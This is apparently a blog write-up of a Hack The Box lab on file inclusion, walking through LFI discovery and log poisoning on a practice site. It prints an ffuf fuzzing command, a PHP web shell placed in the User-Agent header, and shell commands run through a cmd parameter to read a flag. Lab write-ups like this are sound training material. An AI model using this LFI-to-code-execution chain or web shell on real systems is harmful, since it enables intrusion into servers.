Hey folks! I just wrapped up the Skill Assessment for File Inclusion on Hack The Box, and I thought I'd share my journey with you. This challenge was all about assessing a web application for file inclusion and path traversal vulnerabilities. The company, INLANEFREIGHT, had concerns about their new website functionality, so our task was to dig in and see what we could exploit.
Let's break it down step by step. Buckle up, this is going to be fun!
Step 1: Checking Out the Target
We were given a target IP: 94.237.59.30:39018. First things first, I popped it open in my browser to see what we were dealing with. No detailed info was provided, so we had to start from scratch.
Step 2: Finding PHP Files
The simplest move? Check the page source code! That's where we spotted index.php. Adding it to the URL didn't give us much, but that's where PHP filters come into play.
View the source code for the complete output.
Step 3: Decoding the Source Code
Using PHP filters, we could grab the encoded output. Since the content was Base64 encoded, we decoded it using:
echo '<paste your output here>' | base64 -dThis gave us a clear view of the code, and more importantly, revealed an interesting file path. Now, things were getting spicy!
Step 4: Exploring the LFI Vulnerability
Time to test Local File Inclusion (LFI). We used the LFI Wordlist from SecLists to fuzz potential payloads:
ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.59.30:39018/ilf_admin/index.php?log=system.log=FUZZ' -fs 2046
Boom! We found something interesting and verified it in the browser. Now, onto the next step.
Step 5: Log Poisoning
Since we identified nginx as the web server, we attempted log poisoning. This meant injecting a PHP payload inside the logs and executing it remotely.
Here's how we did it:
Replaced /etc/passwd with /var/log/nginx/access.log.
Captured the request using Burp Suite, sent it to the repeater.
Modified the User-Agent header to:
<?php system($_GET['cmd']); ?>Ran our first command: &cmd=id to check execution.
Success! We got command execution. Now, onto the real goal — grabbing the flag!
Step 6: Capturing the Flag
We listed files in the root directory using:
&cmd=ls%20
And guess what? We found the flag file! Now, the final move:
&cmd=cat%20/flag_dacc60f2348d.txt
Tadaaa! We got the flag! But I won't spoil it for you — go try it yourself!
This was a really fun challenge, testing everything from LFI to log poisoning. It just goes to show that thinking outside the box (or should I say, inside the logs? ) really makes a difference.